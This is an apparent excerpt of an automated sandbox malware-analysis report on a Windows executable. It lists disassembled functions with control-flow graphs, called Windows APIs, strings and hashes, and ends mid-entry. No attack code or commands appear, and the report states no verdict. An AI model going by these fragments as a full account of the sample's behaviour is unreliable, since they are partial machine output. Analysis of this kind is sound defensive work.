                                                                  control_flow_graph 813 46d78f-46d7a7 call 46ec50 816 46d7ad-46d7b9 call 473e13 813->816 817 46d9e8-46d9f0 813->817 816->817 820 46d7bf-46d7e7 call 46fff0 816->820 823 46d7f1-46d7ff 820->823 824 46d7e9 820->824 825 46d812-46d818 823->825 826 46d801-46d804 823->826 824->823 828 46d85b-46d85e 825->828 827 46d808-46d80e 826->827 830 46d837-46d844 827->830 831 46d810 827->831 828->827 829 46d860-46d866 828->829 834 46d86d-46d86f 829->834 835 46d868-46d86b 829->835 832 46d9c0-46d9c2 830->832 833 46d84a-46d84e 830->833 836 46d822-46d82c 831->836 839 46d9c6 832->839 833->839 840 46d854-46d859 833->840 841 46d882-46d898 call 45b92d 834->841 842 46d871-46d878 834->842 835->834 835->841 837 46d82e 836->837 838 46d81a-46d820 836->838 837->830 838->836 843 46d830-46d833 838->843 846 46d9cf 839->846 840->828 849 46d8b1-46d8bc call 45a231 841->849 850 46d89a-46d8a7 call 461fbb 841->850 842->841 844 46d87a 842->844 843->830 844->841 848 46d9d6-46d9d8 846->848 853 46d9e7 848->853 854 46d9da-46d9dc 848->854 859 46d8be-46d8d5 call 45b6c4 849->859 860 46d8d9-46d8dd 849->860 850->849 858 46d8a9 850->858 853->817 854->853 857 46d9de-46d9e1 ShowWindow 854->857 857->853 858->849 859->860 863 46d8e4-46d8e6 860->863 863->853 864 46d8ec-46d8f9 863->864 865 46d90c-46d90e 864->865 866 46d8fb-46d902 864->866 867 46d925-46d944 call 46dc3b 865->867 868 46d910-46d919 865->868 866->865 869 46d904-46d90a 866->869 870 46d97b-46d987 CloseHandle 867->870 883 46d946-46d94e 867->883 868->867 876 46d91b-46d923 ShowWindow 868->876 869->865 869->870 873 46d998-46d9a6 870->873 874 46d989-46d996 call 461fbb 870->874 873->848 877 46d9a8-46d9aa 873->877 874->846 874->873 876->867 877->848 880 46d9ac-46d9b2 877->880 880->848 882 46d9b4-46d9be 880->882 882->848 883->870 884 46d950-46d961 GetExitCodeProcess 883->884 884->870 885 46d963-46d96d 884->885 886 46d974 885->886 887 46d96f 885->887 886->870 887->886
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 0046D7AE
                                                                  • ShellExecuteExW.SHELL32(?), ref: 0046D8DE
                                                                  • ShowWindow.USER32(?,00000000), ref: 0046D91D
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0046D959
                                                                  • CloseHandle.KERNEL32(?), ref: 0046D97F
                                                                  • ShowWindow.USER32(?,00000001), ref: 0046D9E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                  • String ID: .exe$.inf$PDGu<F$hF$rF
                                                                  • API String ID: 36480843-1196516857
                                                                  • Opcode ID: 54a1b0b6bd5ed82bb57a08e42422c150582705f2831f344aeee5d901d738d6ed
                                                                  • Instruction ID: 2928dbba602e420b2aded1d75f74414ba10dc426c5855a2f79146451bc3a74ea
                                                                  • Opcode Fuzzy Hash: 54a1b0b6bd5ed82bb57a08e42422c150582705f2831f344aeee5d901d738d6ed
                                                                  • Instruction Fuzzy Hash: 0651C3B0E043809AD731AF659844BAB7BE4AF86744F04082FF8C197251F7788D49C75B
                                                                  Function 0047A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 912 47a95b-47a974 913 47a976-47a986 call 47ef4c 912->913 914 47a98a-47a98f 912->914 913->914 921 47a988 913->921 915 47a991-47a999 914->915 916 47a99c-47a9c0 MultiByteToWideChar 914->916 915->916 918 47a9c6-47a9d2 916->918 919 47ab53-47ab66 call 46fbbc 916->919 922 47aa26 918->922 923 47a9d4-47a9e5 918->923 921->914 925 47aa28-47aa2a 922->925 926 47a9e7-47a9f6 call 482010 923->926 927 47aa04-47aa15 call 478e06 923->927 929 47aa30-47aa43 MultiByteToWideChar 925->929 930 47ab48 925->930 926->930 939 47a9fc-47aa02 926->939 927->930 940 47aa1b 927->940 929->930 933 47aa49-47aa5b call 47af6c 929->933 934 47ab4a-47ab51 call 47abc3 930->934 941 47aa60-47aa64 933->941 934->919 943 47aa21-47aa24 939->943 940->943 941->930 944 47aa6a-47aa71 941->944 943->925 945 47aa73-47aa78 944->945 946 47aaab-47aab7 944->946 945->934 947 47aa7e-47aa80 945->947 948 47ab03 946->948 949 47aab9-47aaca 946->949 947->930 950 47aa86-47aaa0 call 47af6c 947->950 951 47ab05-47ab07 948->951 952 47aae5-47aaf6 call 478e06 949->952 953 47aacc-47aadb call 482010 949->953 950->934 967 47aaa6 950->967 956 47ab41-47ab47 call 47abc3 951->956 957 47ab09-47ab22 call 47af6c 951->957 952->956 966 47aaf8 952->966 953->956 965 47aadd-47aae3 953->965 956->930 957->956 970 47ab24-47ab2b 957->970 969 47aafe-47ab01 965->969 966->969 967->930 969->951 971 47ab67-47ab6d 970->971 972 47ab2d-47ab2e 970->972 973 47ab2f-47ab3f WideCharToMultiByte 971->973 972->973 973->956 974 47ab6f-47ab76 call 47abc3 973->974 974->934
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00475695,00475695,?,?,?,0047ABAC,00000001,00000001,2DE85006), ref: 0047A9B5
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0047ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0047AA3B
                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0047AB35
                                                                  • __freea.LIBCMT ref: 0047AB42
                                                                    • Part of subcall function 00478E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0047CA2C,00000000,?,00476CBE,?,00000008,?,004791E0,?,?,?), ref: 00478E38
                                                                  • __freea.LIBCMT ref: 0047AB4B
                                                                  • __freea.LIBCMT ref: 0047AB70
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1414292761-0
                                                                  • Opcode ID: af612f83698891605cd3ea21b8ab56bf9f97a529b8b3c28aac6a9703954de0ca
                                                                  • Instruction ID: bdca0a099c63e61bc589666b04300d8ffd936fae4b2959d7b7e27805329292c9
                                                                  • Opcode Fuzzy Hash: af612f83698891605cd3ea21b8ab56bf9f97a529b8b3c28aac6a9703954de0ca
                                                                  • Instruction Fuzzy Hash: 5751CA72610216ABDB258E65CC41EEF77AADBC4714F15862EFE08D6140DB38EC60C79A
                                                                  Function 00473B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 977 473b72-473b7c 978 473bee-473bf1 977->978 979 473bf3 978->979 980 473b7e-473b8c 978->980 981 473bf5-473bf9 979->981 982 473b95-473bb1 LoadLibraryExW 980->982 983 473b8e-473b91 980->983 986 473bb3-473bbc GetLastError 982->986 987 473bfa-473c00 982->987 984 473b93 983->984 985 473c09-473c0b 983->985 989 473beb 984->989 985->981 990 473be6-473be9 986->990 991 473bbe-473bd3 call 476088 986->991 987->985 988 473c02-473c03 FreeLibrary 987->988 988->985 989->978 990->989 991->990 994 473bd5-473be4 LoadLibraryExW 991->994 994->987 994->990
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00473C35,?,?,004B2088,00000000,?,00473D60,00000004,InitializeCriticalSectionEx,00486394,InitializeCriticalSectionEx,00000000), ref: 00473C03
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: api-ms-
                                                                  • API String ID: 3664257935-2084034818
                                                                  • Opcode ID: f15253e927cc4506bdc7c366d8d3e47758bcd9fb7554a5c37cbe0e5d132058c0
                                                                  • Instruction ID: 8e6d024fd63e944017cc54defd4619229c1538912fa2acdd10ee38b134db1e73
                                                                  • Opcode Fuzzy Hash: f15253e927cc4506bdc7c366d8d3e47758bcd9fb7554a5c37cbe0e5d132058c0
                                                                  • Instruction Fuzzy Hash: D711E732A44221ABCB229F689C4179E37A49F01772F214662F919EB291D778FF0097DD
                                                                  Function 0046ABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 995 46abab-46abca GetClassNameW 996 46abf2-46abf4 995->996 997 46abcc-46abe1 call 461fbb 995->997 999 46abf6-46abf8 996->999 1000 46abff-46ac01 996->1000 1002 46abe3-46abef FindWindowExW 997->1002 1003 46abf1 997->1003 999->1000 1002->1003 1003->996
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000050), ref: 0046ABC2
                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0046ABF9
                                                                    • Part of subcall function 00461FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0045C116,00000000,.exe,?,?,00000800,?,?,?,00468E3C), ref: 00461FD1
                                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0046ABE9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                  • String ID: @Ut$EDIT
                                                                  • API String ID: 4243998846-2065656831
                                                                  • Opcode ID: 86211eb72ed1a2d5fb3239aa348ae7b2343751e65eea9c8494f8ad8da8b70da2
                                                                  • Instruction ID: 1f4dd851a9c83e5f3a2238df4c6ddb66e2120cc6680a26ecae492ea18e22eba0
                                                                  • Opcode Fuzzy Hash: 86211eb72ed1a2d5fb3239aa348ae7b2343751e65eea9c8494f8ad8da8b70da2
                                                                  • Instruction Fuzzy Hash: 65F0E232A0062877DB206A259C09F9B726C9F42F01F084522BA00B2184E768EA418ABF
                                                                  Function 0046AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 0046081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00460836
                                                                    • Part of subcall function 0046081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0045F2D8,Crypt32.dll,00000000,0045F35C,?,?,0045F33E,?,?,?), ref: 00460858
                                                                  • OleInitialize.OLE32(00000000), ref: 0046AC2F
                                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0046AC66
                                                                  • SHGetMalloc.SHELL32(00498438), ref: 0046AC70
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                  • String ID: riched20.dll$3Qo
                                                                  • API String ID: 3498096277-4232643773
                                                                  • Opcode ID: f0fa8f5a012ffd4b2303338edabe786586a56b03b31dd20139105a04bdbb98c5
                                                                  • Instruction ID: 52bea8ebe04cc11f2063bd6c1a486a469623910c510bd2d2f37d6819da8c503c
                                                                  • Opcode Fuzzy Hash: f0fa8f5a012ffd4b2303338edabe786586a56b03b31dd20139105a04bdbb98c5
                                                                  • Instruction Fuzzy Hash: 3EF04FB1900209ABCB10BFAAD8499AFFFFCEF84705F00416BA401A2201DBB856058BA5
                                                                  Function 004598E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1008 4598e0-459901 call 46ec50 1011 459903-459906 1008->1011 1012 45990c 1008->1012 1011->1012 1013 459908-45990a 1011->1013 1014 45990e-45991f 1012->1014 1013->1014 1015 459927-459931 1014->1015 1016 459921 1014->1016 1017 459936-459943 call 456edb 1015->1017 1018 459933 1015->1018 1016->1015 1021 459945 1017->1021 1022 45994b-45996a CreateFileW 1017->1022 1018->1017 1021->1022 1023 45996c-45998e GetLastError call 45bb03 1022->1023 1024 4599bb-4599bf 1022->1024 1029 4599c8-4599cd 1023->1029 1030 459990-4599b3 CreateFileW GetLastError 1023->1030 1026 4599c3-4599c6 1024->1026 1028 4599d9-4599de 1026->1028 1026->1029 1032 4599e0-4599e3 1028->1032 1033 4599ff-459a10 1028->1033 1029->1028 1031 4599cf 1029->1031 1030->1026 1034 4599b5-4599b9 1030->1034 1031->1028 1032->1033 1035 4599e5-4599f9 SetFileTime 1032->1035 1036 459a12-459a2a call 460602 1033->1036 1037 459a2e-459a39 1033->1037 1034->1026 1035->1033 1036->1037
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00457760,?,00000005,?,00000011), ref: 0045995F
                                                                  • GetLastError.KERNEL32(?,?,00457760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0045996C
                                                                  • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00457760,?,00000005,?), ref: 004599A2
                                                                  • GetLastError.KERNEL32(?,?,00457760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004599AA
                                                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00457760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004599F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateErrorLast$Time
                                                                  • String ID:
                                                                  • API String ID: 1999340476-0
                                                                  • Opcode ID: fc646577122fe414a8353d0f06cbf8488708208ff90b7df6f8faf50211434d5d
                                                                  • Instruction ID: 6fc6cc302b83fe61b59388cf1c1514bc88592cd853f8c87a8bfb801e80fdea26
                                                                  • Opcode Fuzzy Hash: fc646577122fe414a8353d0f06cbf8488708208ff90b7df6f8faf50211434d5d
                                                                  • Instruction Fuzzy Hash: 86311670544745AFD7209F24CC45BDBBBD4BB05325F100B1EF9A1963D2D3A85D48CB99
                                                                  Function 0046B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1067 46b568-46b581 PeekMessageW 1068 46b583-46b597 GetMessageW 1067->1068 1069 46b5bc-46b5be 1067->1069 1070 46b5a8-46b5b6 TranslateMessage DispatchMessageW 1068->1070 1071 46b599-46b5a6 IsDialogMessageW 1068->1071 1070->1069 1071->1069 1071->1070
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0046B579
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046B58A
                                                                  • IsDialogMessageW.USER32(00010424,?), ref: 0046B59E
                                                                  • TranslateMessage.USER32(?), ref: 0046B5AC
                                                                  • DispatchMessageW.USER32(?), ref: 0046B5B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                  • String ID:
                                                                  • API String ID: 1266772231-0
                                                                  • Opcode ID: d5a480ec17f3b5698f36ff2d7817c0ca63757e66e3ac9e9b6edb4040231e65e7
                                                                  • Instruction ID: b83f5299b31d19df5a1a76ea5e1673a9591e094383d35c925efc8bd1fabfd274
                                                                  • Opcode Fuzzy Hash: d5a480ec17f3b5698f36ff2d7817c0ca63757e66e3ac9e9b6edb4040231e65e7
                                                                  • Instruction Fuzzy Hash: EEF0BD71A0111ABB8B20AFE69C4CDDB7FACEE052957004525B906D2114FB38E645CBF9
                                                                  Function 00459785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1072 459785-459791 1073 459793-45979b GetStdHandle 1072->1073 1074 45979e-4597b5 ReadFile 1072->1074 1073->1074 1075 4597b7-4597c0 call 4598bc 1074->1075 1076 459811 1074->1076 1080 4597c2-4597ca 1075->1080 1081 4597d9-4597dd 1075->1081 1078 459814-459817 1076->1078 1080->1081 1082 4597cc 1080->1082 1083 4597df-4597e8 GetLastError 1081->1083 1084 4597ee-4597f2 1081->1084 1085 4597cd-4597d7 call 459785 1082->1085 1083->1084 1086 4597ea-4597ec 1083->1086 1087 4597f4-4597fc 1084->1087 1088 45980c-45980f 1084->1088 1085->1078 1086->1078 1087->1088 1090 4597fe-459807 GetLastError 1087->1090 1088->1078 1090->1088 1092 459809-45980a 1090->1092 1092->1085
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00459795
                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004597AD
                                                                  • GetLastError.KERNEL32 ref: 004597DF
                                                                  • GetLastError.KERNEL32 ref: 004597FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileHandleRead
                                                                  • String ID:
                                                                  • API String ID: 2244327787-0
                                                                  • Opcode ID: e227209f017ca70e03808fbcdd48de475d1e896b8db29ea5116ee5359894090e
                                                                  • Instruction ID: cd8a3bb57c9e97338396dfeb5dcd65337464cefb0f697d4617954a0a2ed1cea4
                                                                  • Opcode Fuzzy Hash: e227209f017ca70e03808fbcdd48de475d1e896b8db29ea5116ee5359894090e
                                                                  • Instruction Fuzzy Hash: 6F118630520204FBDF206F65C80466E77A9FB46727F20892BFC1685292D7789E4CDB69
                                                                  Function 0047AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1093 47ad34-47ad48 1094 47ad55-47ad70 LoadLibraryExW 1093->1094 1095 47ad4a-47ad53 1093->1095 1097 47ad72-47ad7b GetLastError 1094->1097 1098 47ad99-47ad9f 1094->1098 1096 47adac-47adae 1095->1096 1101 47ad7d-47ad88 LoadLibraryExW 1097->1101 1102 47ad8a 1097->1102 1099 47ada1-47ada2 FreeLibrary 1098->1099 1100 47ada8 1098->1100 1099->1100 1104 47adaa-47adab 1100->1104 1103 47ad8c-47ad8e 1101->1103 1102->1103 1103->1098 1105 47ad90-47ad97 1103->1105 1104->1096 1105->1104
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0045D710,00000000,00000000,?,0047ACDB,0045D710,00000000,00000000,00000000,?,0047AED8,00000006,FlsSetValue), ref: 0047AD66
                                                                  • GetLastError.KERNEL32(?,0047ACDB,0045D710,00000000,00000000,00000000,?,0047AED8,00000006,FlsSetValue,00487970,FlsSetValue,00000000,00000364,?,004798B7), ref: 0047AD72
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0047ACDB,0045D710,00000000,00000000,00000000,?,0047AED8,00000006,FlsSetValue,00487970,FlsSetValue,00000000), ref: 0047AD80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3177248105-0
                                                                  • Opcode ID: 6dd777ae693644caf568fe33de626372b877efff5c65a7c95da754faba23aa44
                                                                  • Instruction ID: 7b167608c21183f6abdba1a7a2328e7240c1559f9c1ca6ae4bc4cd45a743427c
                                                                  • Opcode Fuzzy Hash: 6dd777ae693644caf568fe33de626372b877efff5c65a7c95da754faba23aa44
                                                                  • Instruction Fuzzy Hash: EB01D836201222ABC7318F68DC449DF7B99EF85BA37214A35F90AD3650D724DC1187EA
                                                                  Function 0047BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004797E5: GetLastError.KERNEL32(?,00491030,00474674,00491030,?,?,00473F73,00000050,?,00491030,00000200), ref: 004797E9
                                                                    • Part of subcall function 004797E5: _free.LIBCMT ref: 0047981C
                                                                    • Part of subcall function 004797E5: SetLastError.KERNEL32(00000000,?,00491030,00000200), ref: 0047985D
                                                                    • Part of subcall function 004797E5: _abort.LIBCMT ref: 00479863
                                                                    • Part of subcall function 0047BB4E: _abort.LIBCMT ref: 0047BB80
                                                                    • Part of subcall function 0047BB4E: _free.LIBCMT ref: 0047BBB4
                                                                    • Part of subcall function 0047B7BB: GetOEMCP.KERNEL32(00000000,?,?,0047BA44,?), ref: 0047B7E6
                                                                  • _free.LIBCMT ref: 0047BA9F
                                                                  • _free.LIBCMT ref: 0047BAD5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
